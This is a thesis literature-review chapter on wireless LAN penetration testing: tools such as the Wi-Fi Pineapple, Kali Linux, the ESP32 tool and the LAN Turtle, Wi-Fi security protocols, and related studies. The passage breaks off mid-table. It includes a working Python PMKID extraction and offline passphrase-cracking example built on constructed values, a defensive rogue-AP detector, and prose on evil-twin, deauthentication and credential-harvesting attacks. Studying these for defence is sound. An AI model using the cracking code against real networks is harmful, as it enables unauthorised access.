
CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

CHAPTER II

REVIEW OF RELATED LITERATURE AND STUDIES

This chapter presents the literature and studies that the researcher considered in strengthening the claim and importance of the present study. It covers penetration testing of the security of a wireless local area network within a specific location, and it cites and discusses the writings of recognized experts in this field of study.

RELATED LITERATURE

According to (Harvey, 2019)[19], a wireless penetration test examines wireless security settings that might be used as an attack vector to reach internal resources. Because of its accessibility and simplicity, wireless technology has become a crucial component of modern business: there are no cables or cords, only radio signals carrying information to the device of your choice. Consequently, wireless technology, like every other technology, is susceptible to malicious attacks. The potential problems range from poor Wi-Fi security configurations to the choice of a weak encryption method.

According to (Mehta, 2021)[20], a penetration test is a cybersecurity approach used by businesses to uncover, test, and highlight security flaws. Ethical hackers are frequently engaged to conduct these tests. To assess how easily an organization's computer systems, network, or online services can be compromised, these in-house personnel or third parties simulate the techniques and behaviors of an attacker. Pen testing may also be used to assess an organization's adherence to compliance standards. Pen testing differs from other cybersecurity evaluation methods in that it can be customized for each company or organization: a certain set of hacking methods or tools may be appropriate depending on the structure and operations of the organization.

According to (Kevin Beaver, 2018)[21], it will be difficult to complete the work efficiently without the equipment necessary for penetration testing. However, using the right tools does not guarantee that you will identify all of the problems in the system, so be aware of the limitations imposed by your tools. There are several vulnerability scanners available, and many of them produce false positives (reporting a vulnerability that is not present) and false negatives (missing a vulnerability that is). There are many tools, and each one is designed to perform a particular test; no single tool can test for everything.

PENETRATION TESTING TOOLS

According to (Robb, 2020)[22], a variety of Wi-Fi testing tools are available because of both the potential of Wi-Fi and the security risks it poses. Many are free or open source, but there are also paid tools for users with more complex requirements. These tools offer capabilities such as Wi-Fi performance and bottleneck analysis, network scanning, site surveys, Wi-Fi spectrum analysis, audits, traffic analysis, packet sniffing, penetration testing, monitoring, management, and inventorying. With so many alternatives on the market, each with its own set of features, benefits, and price points, selecting a solution can be difficult.

WI-FI PINEAPPLE

The Wi-Fi Pineapple is a network auditing device used by several cybersecurity and networking organizations. It is easy to learn and use, delivers thorough information about network security, and is simple to set up. One function of the Wi-Fi Pineapple is the ability to spoof Wi-Fi networks: the Pineapple disguises itself as a known Wi-Fi network and convinces Wi-Fi clients to join it instead, which then enables the operator of the Pineapple to target the users connected to the faked network (Hautzinger, 2021)[23].

Engineers at Hak5 originally conceived the Pineapple to conduct pen tests and to assist network managers in auditing network security. The AP, which some people think looks more like a spider than a pineapple, gives network engineers the ability to attack their own network in order to find flaws and put defenses in place that make the network more resistant to future attackers. When used in penetration testing, the Pineapple acts as a honeypot. An "evil twin" or "pineapple sandwich" refers to a situation in which a Pineapple is used as a rogue access point (AP) to exploit security weaknesses through a man-in-the-middle (MitM) attack (Lutkevich, 2022)[24]. For man-in-the-middle attacks, the Wi-Fi Pineapple serves as the access point. In these spoofing attacks, the attacker covertly intercepts and relays private communications between users of public wireless networks and the websites they are accessing (NI Cyber Guy, 2021)[25].

Hak5 describes the device as combining next-generation network processors with multiple role-based radios and its patented PineAP suite, hardened and extensively tested to withstand tough conditions. The WiFi Pineapple Mark VII is operated from a simple web interface and includes an ecosystem of apps, automated pentest campaigns, and Cloud C2 for remote access from anywhere in the world (Hak5, 2019)[26]. The Wi-Fi Pineapple contains a full suite of penetration testing modules called PineAP, including capabilities for reporting, logging, tracking, and surveillance used in carrying out MitM attack tactics (NI Cyber Guy, 2021)[25].

Furthermore, the Wi-Fi Pineapple is regarded as one of the riskiest devices available, because it exploits fundamental aspects of how Wi-Fi clients and the Internet work and can be purchased by anyone at a low price and used to steal data. As a widely available gadget, the Wi-Fi Pineapple gives inexperienced or would-be hackers (script kiddies) access to several effective attack capabilities. It is a strong and versatile tool that, depending on the user's intention, may be useful or harmful. While the Pineapple has the potential to be abused, it also has a far greater chance of helping defenders stop those with malicious intentions (NI Cyber Guy, 2021)[25].

RASPBERRY PI

The Raspberry Pi is a computer about the size of a credit card. Its creator, Eben Upton, originally wanted to make a low-cost device that would help pre-university students learn how to code and understand hardware. It is a capable little computer that can be used in electronics projects and for many of the same things as a desktop computer, such as spreadsheets, word processing, browsing the internet, and playing games, and it can also play HD video. The Raspberry Pi is slower than a modern laptop or desktop, but it is still a full Linux computer that can do everything you would expect while using less power (Lucideus, 2018)[27].

Many people regard the Raspberry Pi as a natural next step for Linux users. It is a low-cost, credit-card-sized single-board computer that is usually connected to a monitor with an HDMI (High-Definition Multimedia Interface) cable. The Raspberry Pi is one of the newest platforms used for penetration testing; although it has to be bought, it is inexpensive and available to everyone. It is used in penetration testing because it is a small computer, sometimes called a "microcomputer," and the range of hardware-supported accessories makes it flexible (N. Balaji, 2020)[28].

The Raspberry Pi cannot replace a desktop computer because of its slower processor. Downloading and installing applications takes time, which limits advanced multitasking, and it cannot run a standard desktop Windows installation. It is suitable for those who want a device they can personalize to suit their needs and tastes, not for those who simply want to get a task done fast (Pantech ELearning, 2021)[29]. The Raspberry Pi has no internal storage, so it needs a micro-SD card to serve as its storage. SD cards are slow, and that slowness lengthens the board's startup time and limits its read/write speed. The board also does not come with heatsinks or cooling fans pre-installed; if used continuously for 6-7 hours without air conditioning or a heat sink, it will eventually reach temperatures significantly higher than 70 degrees Celsius (MACFOS, 2020)[30].

KALI LINUX

Kali Linux is a Debian-based variant of the well-known Linux operating system that makes penetration testing considerably simpler. Advanced users may use Kali to execute information security tests to find and patch potential program vulnerabilities. One of its key distinguishing features is that it has been ported to the ARM architecture, so in addition to desktop computers and laptops, Kali can also be installed on Android-based smartphones (aid, 2019)[31]. Kali Linux is a free operating system made for security analytics and penetration testing. Formerly called BackTrack, it is a distribution focused on security and forensics, used by both attackers and people who work in security. Kali is used because it is scalable, stable, and easy to use, which are the qualities any professional would want in order to analyze, audit, test, check, and evaluate the security of networks (N. Balaji, 2020)[28].

Kali Linux ships with approximately 600 preconfigured penetration-testing programs, each with a different level of flexibility and application. Kali Linux divides these tools into categories: information gathering, vulnerability analysis, wireless attacks, web applications, stress testing, forensics tools, sniffing and spoofing, password attacks, maintaining access, reverse engineering, reporting tools, and hardware hacking (Williams, 2019)[32]. Users can modify and customize Kali Linux ISO images using its live-build functionality. Kali Linux is completely free and open source and does not include proprietary software or drivers. It is available for VirtualBox, VMware, Raspberry Pi, ARM images, and cloud instances, among other platforms. Because it runs on a variety of hardware and connects to many USB and other wireless devices, Kali Linux is built to work with as many wireless devices as possible (Khanna, 2022)[33].

Furthermore, Kali Linux is not for complete beginners. It is a penetration testing package intended for advanced users and will be challenging for someone new to Linux. Although Kali ships with a desktop environment, most of its tools are command-line programs, so most tasks are completed via the command line. Documentation for many of the bundled tools is thin, which can make learning to use all of them challenging. Kali Linux is not intended to be your primary operating system (Khanna, 2022)[33].

USB WIRELESS ADAPTER

When it comes to Wi-Fi hacking and pen testing, Alfa's AWUS036NHA is one of the best wireless adapters the company has produced. With its Atheros AR9271 chipset, it works with most Linux distributions out of the box (Cyberpunk, 2018). The Alfa AWUS036NHA is one of the best-known monitor-mode Wi-Fi adapters. It is an IEEE 802.11b/g/n-compatible USB adapter that supports link rates of up to 150 Mbps in the 2.4 GHz band and, for 802.11b/g devices, up to 54 Mbps (KaliTut, 2021)[34].

The Alfa AWUS036NHA USB Wi-Fi adapter is one of the best choices for wireless pen testing with Kali Linux and is very popular among Kali users. It is small, has a great range, and costs very little. Setup is easy because the driver is already built into the kernel: you just plug the adapter into your device (Kali Linux and some other Linux distributions) to use it. The AWUS036NHA differs from most of its predecessors in that it supports all six wireless interface modes, which is what matters for monitor mode. With it you can capture a valid WPA2-PSK handshake (the WPA four-way handshake), uncover a hidden SSID, generate ARP frames for a WEP replay attack, perform man-in-the-middle (MITM) attacks, and more (Cyberpunk, 2018)[35].

A drawback of many USB adapters is that they lack an external antenna, which limits their range and power, and users often complain about slower speeds when using them (the AWUS036NHA, with its detachable external antenna, is an exception). The best feature of a USB adapter can also be its largest disadvantage: because it needs no installation, anyone can plug it into a host and use it, so there is no control over who uses it, and anyone may easily unplug the device and walk away with it. Repeatedly unplugging the adapter from a PC or laptop may also damage the USB port (Chahal, 2018)[36].

ESP32 WI-FI PENETRATION TOOL

Wi-Fi is something most of us would find difficult to live without. Unfortunately, there are a number of flaws in the underlying 802.11 standards that can be exploited (By, 2021)[37]. The ESP32 Wi-Fi Penetration Tool is an all-purpose tool for the ESP32 platform for carrying out different Wi-Fi attacks. It includes basic functionality that is commonly needed in Wi-Fi attacks and simplifies the implementation of new ones. It covers attacks such as obtaining PMKIDs or WPA handshakes from the target network by various means, such as creating a rogue replicated AP or transmitting deauthentication frames directly (Son, 2021)[38].

According to (Expert, 2021)[39], WPA/WPA2 handshakes are acquired either by passively listening for devices connecting to the target network or by performing a deauthentication attack and then monitoring for devices reconnecting. PMKIDs are obtained from APs that support PMK caching or roaming by examining the first message of the WPA four-way handshake, in which the AP includes the PMKID, so no connected client is needed. The ESP32 Wi-Fi Penetration Tool formats the captured data as PCAP and HCCAPX files, which can then be analyzed with Wireshark and cracked with Hashcat (current Hashcat releases prefer the hc22000 format, mode 22000, for both handshakes and PMKIDs). To manage the tool, it starts a management access point from which the target and attack type can be selected and the resulting data downloaded. Combined with a battery, the ESP32 can be used on the go. Note, however, that the ESP32 only supports 2.4 GHz Wi-Fi; it will not connect to a 5 GHz network (Federov, 2022)[40].
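The PMKID attack described above can be demonstrated end to end without any radio hardware. The following is an added example written for this review; it is not code from the ESP32 Wi-Fi Penetration Tool or from any cited author. It derives the WPA2-Personal PMK with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt), computes the PMKID as the first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC), embeds it in a constructed EAPOL-Key message 1 the way an AP would, parses it back out of the key-data KDEs, emits a Hashcat 22000 line (the WPA*01*PMKID*MAC_AP*MAC_STA*ESSID*** layout assumed here is the one Hashcat documents for PMKID entries), and runs a small offline dictionary attack. The MAC addresses, SSID, passphrase and wordlist are constructed for the example.

```python
import hashlib
import hmac
from typing import Optional

# Constructed values for this example only (no real network was captured)
AP_MAC = bytes.fromhex("0242ac110002")   # BSSID of the target AP (constructed)
STA_MAC = bytes.fromhex("0242ac110003")  # MAC of the client/attacker (constructed)
SSID = "ExampleNet"                      # network name (constructed)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_eapol_message1(pmkid: bytes) -> bytes:
    """Constructed EAPOL-Key message 1 (802.1X header + RSN key descriptor).
    Only the key-data field matters here; nonce, IV, RSC, key ID and MIC are zeroed."""
    kde = b"\xdd" + bytes([4 + 16]) + b"\x00\x0f\xac\x04" + pmkid   # vendor KDE, type 4 = PMKID
    body = (
        b"\x02"            # descriptor type: RSN key descriptor
        + b"\x00\x8a"      # key information: pairwise + ACK (message 1)
        + b"\x00\x10"      # key length 16
        + b"\x00" * 8      # replay counter
        + b"\x00" * 32     # ANonce
        + b"\x00" * 16     # key IV
        + b"\x00" * 8      # key RSC
        + b"\x00" * 8      # key ID
        + b"\x00" * 16     # key MIC (not present in message 1)
        + len(kde).to_bytes(2, "big") + kde
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # version 2, type 3 = EAPOL-Key


def extract_pmkid(eapol: bytes) -> Optional[bytes]:
    """Walk the key-data KDEs of an EAPOL-Key frame and return the PMKID if one is present."""
    if len(eapol) < 4 or eapol[1] != 3:
        return None
    body = eapol[4:4 + int.from_bytes(eapol[2:4], "big")]
    key_data_len = int.from_bytes(body[93:95], "big")   # fixed fields occupy bytes 0..92
    key_data = body[95:95 + key_data_len]
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        payload = key_data[i + 2:i + 2 + length]
        if tag == 0xDD and payload[:4] == b"\x00\x0f\xac\x04" and len(payload) == 20:
            return payload[4:20]
        i += 2 + length
    return None


def hc22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Hashcat mode 22000 line for a PMKID (type 01); the handshake-only fields stay empty."""
    return f"WPA*01*{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"


def crack_pmkid(pmkid: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, wordlist) -> Optional[str]:
    """Offline dictionary attack: once the PMKID is known no client traffic is needed."""
    for candidate in wordlist:
        if compute_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac) == pmkid:
            return candidate
    return None


if __name__ == "__main__":
    real_pmkid = compute_pmkid(derive_pmk("correct-horse-battery", SSID), AP_MAC, STA_MAC)
    frame = build_eapol_message1(real_pmkid)           # what the AP would send as message 1
    found = extract_pmkid(frame)
    print(hc22000_line(found, AP_MAC, STA_MAC, SSID))
    print(crack_pmkid(found, SSID, AP_MAC, STA_MAC, ["password", "letmein", "correct-horse-battery"]))
```

The point the passage makes is visible in `crack_pmkid`: the only secret in the computation is the passphrase, so an AP that hands out the PMKID in message 1 has given an attacker everything needed for an offline guess, which is why the Alsahlany study's recommendation of long, non-dictionary passphrases matters.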

USB ETHERNET ADAPTER

The LAN Turtle is a covert systems administration and penetration testing tool that offers man-in-the-middle surveillance capabilities, network information collection, and stealth remote access through a straightforward graphical shell. Its discreet design, housed inside a generic "USB Ethernet Adapter" case, lets the LAN Turtle blend into many IT environments. It has many functions for remote access and network reconnaissance. With all modules turned off it functions as a plain USB Ethernet adapter, but it also lets you run surveillance operations and communicate with the device from anywhere. The LAN Turtle offers a large number of modules and scripts (Cyberpunk, 2019)[41].

In addition, the LAN Turtle is a tiny device that may be placed discreetly on a target computer to poison DNS, creating potential phishing endpoints. With its various modules, a user can sniff (listen to) all data transferred across the network. After a little configuration and reconnection to the server, an attacker can reach the target's network and harvest usernames and passwords from a locked PC without needing to join the network. Installed between a target machine and the LAN, it can intercept and log web traffic (Cyberpunk, 2019)[41]. This kind of device is most effective in institutional settings with a large number of desktop PCs and little concern about such devices; even highly skilled IT experts may be unconcerned about LAN Turtles or entirely unaware of their existence (Tatianna, 2018)[42].

WIRELESS SECURITY PROTOCOLS

Wireless encryption, together with an authentication protocol, keeps a wireless network safe: when a person or device tries to connect, a password or network key is required. If a wireless network is not secured, people who are not supposed to be on it can connect, obtain personal information, or use the internet connection for harmful or illegal activity, and unauthorized use can also slow the network down (Sony Latin America, 2022)[43].

Wireless networks and their security are critical today for studying, entertainment, and daily life. Authentication and authorization are two of the most crucial steps in protecting one's privacy, and wireless security encryption protects authentication on wireless networks. Encryption matters because it prevents exposure of information that could jeopardize the privacy of people or organizations. The forms of encryption that can be used are determined by the capabilities of networking equipment such as routers; the manufacturer may supply a default encryption key, often printed on the bottom of the router. Wireless security encryption prevents unauthorized users from accessing wireless equipment (GeeksforGeeks, 2022)[44].

Wi-Fi security is intended to prevent unauthorized access to wireless devices. Most home routers offer several security settings with varying levels of protection. They are not all equal, so it is critical to find out what type of security your Wi-Fi employs. Many wireless security protocols have been created for residential wireless networks; the most common today are WEP, WPA, and WPA2, each of which employs a different type of encryption. The most recent protocol, WPA3, has proven to be considerably stronger, making attacks much more difficult (Atria Convergence Technologies Ltd., 2021)[45].

Wired Equivalent Privacy (WEP) was the first Wi-Fi security standard and for years the most widely deployed. It was introduced as the privacy feature of IEEE 802.11, a set of technical standards intended to give a wireless LAN (WLAN) security comparable to that of a wired local area network (LAN), and it was approved as a security standard by the Wi-Fi Alliance. Although WEP was originally marketed as providing the same security as a wired connection, a variety of security problems were found in it over time, and these flaws have become easier to exploit as computing power has grown. Despite efforts to improve it, WEP remains insecure, and the Wi-Fi Alliance formally deprecated it (Ghimiray, 2022)[46].

WPA is a security certification standard designed by the Wi-Fi Alliance to protect wireless computer networks. It was introduced in 2003 as a replacement for Wired Equivalent Privacy (WEP), which had several known security flaws. To secure Wi-Fi networks, WPA requires users to present a password during authentication, and it is also compatible with authentication servers such as Remote Authentication Dial-In User Service (RADIUS) servers. Furthermore, it encrypts data better than WEP: WPA-secured networks use the Temporal Key Integrity Protocol (TKIP) with a pre-shared key, and TKIP uses the RC4 cipher for encryption (BasuMallick, 2022)[47].

Wi-Fi Protected Access (WPA) is a security protocol intended to protect wireless computer networks, created by the Wi-Fi Alliance to replace the older Wired Equivalent Privacy (WEP) standard. WPA uses the Temporal Key Integrity Protocol (TKIP) to encrypt data sent over the wireless network, with the Advanced Encryption Standard (AES) available as an option and made mandatory in WPA2, offering greater data security and network access control than WEP (Kuhn et al., 2018)[48]. WPA2 and AES-CCMP, however, did not remain safe indefinitely: the well-publicized KRACK (key reinstallation) attack of late 2017 broke the WPA2 four-way handshake by tricking a client into reinstalling an already-used key, which causes nonce reuse in CCMP. KRACK cannot be fixed by a change to WPA2 itself, because it exploits a flaw in the 802.11i standard rather than in a specific implementation. Implementations can largely prevent the attack by refusing EAPOL-Key frame retransmission during key installation, at the cost of possibly longer reconnection times for devices whose frames were dropped (Salter, 2019)[49].

WPA3, released in June 2018, is the replacement for WPA2, which security experts consider compromisable. WPA3 was designed to be easier to use and stronger in its encryption. Like WPA2 it comes in Personal and Enterprise editions, but it improves on WPA2 with stronger authentication and encryption features and a fix for KRACK, a flaw inherent in WPA2's handshake. It also includes features that make connecting IoT Wi-Fi devices easier and more secure (Hoelscher, 2018)[50].
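Two passages above call for the same check: the advice to find out what type of security a Wi-Fi network employs (Open, WEP, WPA-TKIP, WPA2, WPA3), and the Wi-Fi Pineapple's evil-twin trick of advertising a known SSID on a rogue AP. Both can be done from beacon frames alone. The following is an added example written for this review, not code from any cited source or from Hak5: it parses the RSN (tag 48) and WPA (vendor tag 221, OUI 00-50-F2) information elements to classify a network and list the weaknesses a tester would report (TKIP still allowed, 802.11w management frame protection not required), then flags any SSID that is advertised by more than one BSSID where one copy is weaker than the other, which is what a Pineapple clone of a WPA2 network looks like. The beacons, BSSIDs and SSIDs are constructed for the example; the IE layouts follow the 802.11 standard.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

RSN_OUI = b"\x00\x0f\xac"
WPA_OUI = b"\x00\x50\xf2"
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104", 8: "GCMP-128", 9: "GCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 8: "SAE", 9: "FT-SAE"}


@dataclass
class Beacon:
    bssid: str
    ssid: str
    channel: int
    privacy: bool                  # Privacy bit of the capability field
    ies: List[Tuple[int, bytes]]   # (tag, body) information elements


def _parse_suites(body: bytes, oui: bytes) -> dict:
    """Suite lists shared by the WPA vendor IE and the RSN IE (after the version field):
    group cipher, pairwise cipher list, AKM list, then the optional RSN capabilities."""
    def suite(off: int) -> str:
        return CIPHERS.get(body[off + 3], "?") if body[off:off + 3] == oui else "vendor"
    group = suite(0)
    n = int.from_bytes(body[4:6], "little")
    pairwise = [suite(6 + 4 * k) for k in range(n)]
    off = 6 + 4 * n
    m = int.from_bytes(body[off:off + 2], "little")
    akm = [AKMS.get(body[off + 2 + 4 * k + 3], "?") for k in range(m)]
    off += 2 + 4 * m
    caps = int.from_bytes(body[off:off + 2], "little") if len(body) >= off + 2 else 0
    # RSN capabilities: bit 6 = MFP required, bit 7 = MFP capable (802.11w)
    return {"group": group, "pairwise": pairwise, "akm": akm,
            "mfp_required": bool(caps & 0x40), "mfp_capable": bool(caps & 0x80)}


def classify(b: Beacon) -> dict:
    """Return the security mode a beacon advertises and the weaknesses a tester would report."""
    rsn = next((body for tag, body in b.ies if tag == 48), None)
    wpa = next((body for tag, body in b.ies if tag == 221 and body[:4] == WPA_OUI + b"\x01"), None)
    findings: List[str] = []
    if rsn is not None:
        s = _parse_suites(rsn[2:], RSN_OUI)          # skip the 2-byte version
        if "SAE" in s["akm"] or "FT-SAE" in s["akm"]:
            mode = "WPA3-SAE"
        elif "802.1X" in s["akm"]:
            mode = "WPA2-Enterprise"
        else:
            mode = "WPA2-PSK"
        if "TKIP" in s["pairwise"] or s["group"] == "TKIP":
            findings.append("TKIP allowed alongside CCMP: clients can be held on the RC4-based cipher")
        if not s["mfp_required"]:
            findings.append("management frames unprotected (802.11w not required): deauthentication works")
    elif wpa is not None:
        s = _parse_suites(wpa[6:], WPA_OUI)          # skip OUI, type and version
        mode = "WPA (TKIP)"
        findings.append("WPA1 with TKIP (RC4) is deprecated")
    elif b.privacy:
        mode, findings = "WEP", ["WEP: key recoverable from captured traffic"]
    else:
        mode, findings = "Open", ["no encryption: traffic readable by anyone in range"]
    return {"mode": mode, "findings": findings}


def find_evil_twins(beacons: List[Beacon]) -> List[str]:
    """Flag an SSID advertised by several BSSIDs where one copy is weaker than the strongest:
    a rogue AP usually clones the SSID but not the security configuration."""
    rank = {"Open": 0, "WEP": 1, "WPA (TKIP)": 2, "WPA2-PSK": 3, "WPA2-Enterprise": 3, "WPA3-SAE": 4}
    by_ssid: Dict[str, List[Tuple[str, str]]] = {}
    for b in beacons:
        by_ssid.setdefault(b.ssid, []).append((b.bssid, classify(b)["mode"]))
    alerts = []
    for ssid, aps in by_ssid.items():
        best = max(rank[m] for _, m in aps)
        alerts += [f"{ssid}: {bssid} advertises {m}, weaker than another AP with the same SSID"
                   for bssid, m in aps if rank[m] < best]
    return alerts


def rsn_ie(pairwise: List[int], akm: List[int], caps: int) -> Tuple[int, bytes]:
    """Build a constructed RSN IE (tag 48) with a CCMP group cipher and the given suites."""
    body = b"\x01\x00" + RSN_OUI + b"\x04"
    body += len(pairwise).to_bytes(2, "little") + b"".join(RSN_OUI + bytes([c]) for c in pairwise)
    body += len(akm).to_bytes(2, "little") + b"".join(RSN_OUI + bytes([a]) for a in akm)
    return 48, body + caps.to_bytes(2, "little")


# Constructed sample beacons (no real network was captured for this example)
WPA1_TKIP_IE = (221, WPA_OUI + b"\x01" + b"\x01\x00" + WPA_OUI + b"\x02"
                + b"\x01\x00" + WPA_OUI + b"\x02" + b"\x01\x00" + WPA_OUI + b"\x02")
SAMPLE = [
    Beacon("02:11:22:33:44:01", "CEA-Lab", 6, True, [rsn_ie([4], [2], 0x0000)]),    # WPA2-PSK, no 802.11w
    Beacon("02:11:22:33:44:02", "CEA-Lab", 6, False, []),                           # open clone of that SSID
    Beacon("02:11:22:33:44:03", "Guest", 1, True, [rsn_ie([2, 4], [2], 0x0000)]),   # WPA2 mixed TKIP/CCMP
    Beacon("02:11:22:33:44:04", "Secure", 36, True, [rsn_ie([4], [8], 0x00c0)]),    # WPA3-SAE, MFP required
    Beacon("02:11:22:33:44:05", "Legacy", 11, True, [WPA1_TKIP_IE]),                # WPA1 TKIP
]

if __name__ == "__main__":
    for b in SAMPLE:
        print(b.bssid, b.ssid, classify(b))
    for alert in find_evil_twins(SAMPLE):
        print("ALERT", alert)
```

In a real survey the `Beacon` records would be filled from a monitor-mode capture (the fields used here are all present in every beacon frame); the classifier then gives the tester the protocol inventory the section above asks for, and the twin check gives a first indication of a rogue AP before any client is lured onto it.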

WIRELESS FIDELITY

Every day, most of the world's population depends on wireless networking technology. Wi-Fi is the most common way of connecting devices to a router and thus to the internet. The wireless control points are called access points (APs); a home usually has a single router with a built-in access point, whereas an organization that must cover a large area needs many access points, or additional routers and APs joined into a mesh network. The IEEE develops and maintains the IEEE 802.11 standards, the fundamental framework for all Wi-Fi networks. Successive revisions of the standard use the 2.4 GHz and 5 GHz bands; because the 2.4 GHz band is crowded with older Wi-Fi and other devices, each band is divided into channels so that nearby networks can avoid interfering with one another (Shaw, 2020)[51].

Wireless N (802.11n) is the version of the 802.11 standards used in most homes. It has been available since 2009, and most Internet Service Providers (ISPs) have shipped wireless routers as standard for years. Wireless N can operate in both the 2.4 GHz and 5 GHz bands. The newer and faster wireless AC (802.11ac) standard, which operates in the 5 GHz band, is becoming more common, and the current routers offered by the Philippines' largest ISPs all include wireless AC as standard, together with legacy wireless N to support older devices that operate on 2.4 GHz (Chua, 2019).

The Wi-Fi Alliance has introduced a new consumer naming scheme to simplify the different wireless options for customers. Under the new scheme, the existing letter designations such as G, N, and AC are given generation numbers. The new designations are expected to become widely visible with 802.11ax devices, since Wi-Fi 6 is the generation now being released, and future products will follow the same pattern. The new naming coincided with the release of the improved Wi-Fi version known as Wi-Fi 6 (802.11ax), which plays a larger role in dense networks with many devices connecting at the same time, such as airports or concert halls (Wi-Fi Alliance, 2018). The old and new designations stated by the Wi-Fi Alliance are shown in the table below (Chavez, 2020)[52].

Table 1: Wi-Fi Alliance Old/New Designation

Old Designation    New Designation
802.11ax           Wi-Fi 6
802.11ac           Wi-Fi 5
802.11n            Wi-Fi 4
802.11g            Wi-Fi 3
802.11a            Wi-Fi 2
802.11b            Wi-Fi 1

(The Wi-Fi Alliance officially assigned only the names Wi-Fi 4, 5, and 6; Wi-Fi 1 to 3 for 802.11b/a/g are informal back-formations.)

RELATED STUDIES

In the study entitled "Experimental Evaluation of Different Penetration Security Levels in Wireless Local Area Network" (Ali Alsahlany, et al., 2019)[53], the researchers investigated the risks of the different security levels used to protect WLANs, such as a hidden SSID, MAC filtering, and WPA2. They found it preferable to configure the AP's security mode by enabling all security levels at once (hidden SSID, MAC address filter, and WPA2 AES encryption). They also recommend disabling WPS to prevent an attacker from exploiting protocol weaknesses to determine the default PIN. Furthermore, the researchers used complex WPA2 passphrases longer than 16 characters containing lowercase letters, capital letters, special characters, and digits, while avoiding consecutive numbers and letters.

In another study, "A Comprehensive Study on Penetration Testing Techniques" (M. K. Khan et al., 2018)[54], the researchers begin by discussing penetration testing and outlining its advantages and difficulties. They then give a thorough analysis of the various penetration testing methods, including wireless and social engineering methods. The wireless penetration testing section of their study discusses the different types of wireless networks and identifies the risks associated with each. The researchers also describe the tools and techniques used to assess the security of wireless networks, including sniffing tools, rogue access point detection, and man-in-the-middle (MITM) attacks.

Moreover, in the study "Security Analysis of Wireless Local Area Network (WLAN) Network with the Penetration Testing Method" (F. Fikriyadi et al., 2020)[55], the researchers examined how WLAN security works and assessed it through penetration testing, since wireless networks lack the level of security of wired networks. Most of the time, security holes in wireless networks come from how they are set up or how they encrypt data. The setup is vulnerable partly because it is so easy to set up a wireless network these days: many manufacturers add features that make life easier for users and network administrators, so many wireless networks keep the recommended default settings, including the SSID, IP address, remote management, DHCP, frequency channels, username, and password.

In addition, in the study "Penetration testing and security analysis of wireless networks: A survey" (Sudhakar et al., 2018)[56], the researchers set out to give a broad overview of the state of wireless network security analysis and penetration testing at that time. Their analysis centered on the methods, resources, and difficulties faced by security analysts while evaluating and safeguarding wireless networks. Even though wireless networks are increasingly common, security remains a significant issue because effective security measures are often lacking. To address this, the researchers surveyed current wireless network security assessment tools and penetration testing techniques, and examined a range of penetration testing methodologies covering reconnaissance, vulnerability scanning, exploitation, and post-exploitation. They also examined a range of wireless network vulnerabilities, such as man-in-the-middle, denial-of-service, and rogue access point attacks.

Furthermore, in the study "A Survey on Network Penetration Testing" (G. Jayasuryapal et al., 2021)[57], network penetration testing is described as an essential security measure that every organization should consider, as cybercrime is on the rise because of inadequate security practices. A penetration tester needs a reliable methodology to test a network thoroughly. According to the researchers' findings, a tester should divide the work into stages: information collection, scanning, enumeration, exploitation and post-exploitation, and reporting. The study therefore covers the procedures and stages (from information gathering to target exploitation) as well as the various types and methods of penetration testing.

Moreover, in the study "Efficacy of Unconventional Penetration Testing Practices" (S. Mishra, 2021)[58], companies and governments are noted to have lost a great deal of money and privacy to cyberattacks, with even seemingly unimportant information put at risk. The researcher therefore states that thorough penetration testing, assessment techniques, and tools are needed to analyze and present the unconventional penetration techniques and tactics currently available, to test and examine their key features and their role in supporting cybersecurity, and to measure how well they work. Because these unconventional ways of testing for vulnerabilities do not require as much time-consuming code writing, they are easier to manage and add more to the security assessment. The issue with traditional vulnerability testing is that it does not always solve security problems, because technology keeps changing; there will always be weaknesses, security holes, and threats, even as new, unconventional penetration testing methods are developed. Non-traditional testing methods are often used when assessing how safe a system is, to save time and confirm that the system is secure. The researcher expects future penetration testing to be scalable so that it can adapt to changes in the target system, whereas current penetration testing is based on pre-built frameworks.

SUMMARY OF THE RELATED STUDIES

The table below summarizes the studies related to the researchers' study, Penetration Testing for the Wireless Local Area Network (WLAN) of the College of Engineering and Architecture (CEA) of Pangasinan State University, Urdaneta City Campus. It lists the features of the present system that are also found in the cited studies, together with each study's research gap.

Table 2. Summary of Related Studies

(Columns: Study; Author/s; Year; Features on our system that are also available in the cited study; Research Gap)

Study: Experimental Evaluation of Different Penetration Security Levels in Wireless Local Area Network
Author/s: Ali Alsahlany, et al.
Year: 2019
Features on our system also available in the cited study: Penetration Testing: the researchers conducted a series of penetration tests on the network to evaluate its security. Attack Scenarios: the researchers simulated different attack scenarios, such as brute-force attacks, dictionary attacks and man-in-the-middle attacks.
Research Gap: The study does not cover the latest developments in penetration testing techniques and tools that can be used to assess the security of WLANs.

Study: A Comprehensive Study on Penetration Testing Techniques
Author/s: M. K. Khan et al.
Year: 2018
Features on our system also available in the cited study: Information gathering: the researchers discuss various techniques used to gather information about the target system, such as network scanning. Wireless network security testing: the researchers examine wireless network security testing, including wireless network scanning and cracking wireless encryption schemes.
Research Gap: The study does not explore the different techniques and methods that can be used for effective WLAN penetration testing. Such a study could include examining the vulnerabilities specific to WLANs.

Study: Security Analysis of Wireless Local Area Network (WLAN) Network with the Penetration Testing Method
Author/s: F. Fikriyadi et al.
Year: 2020
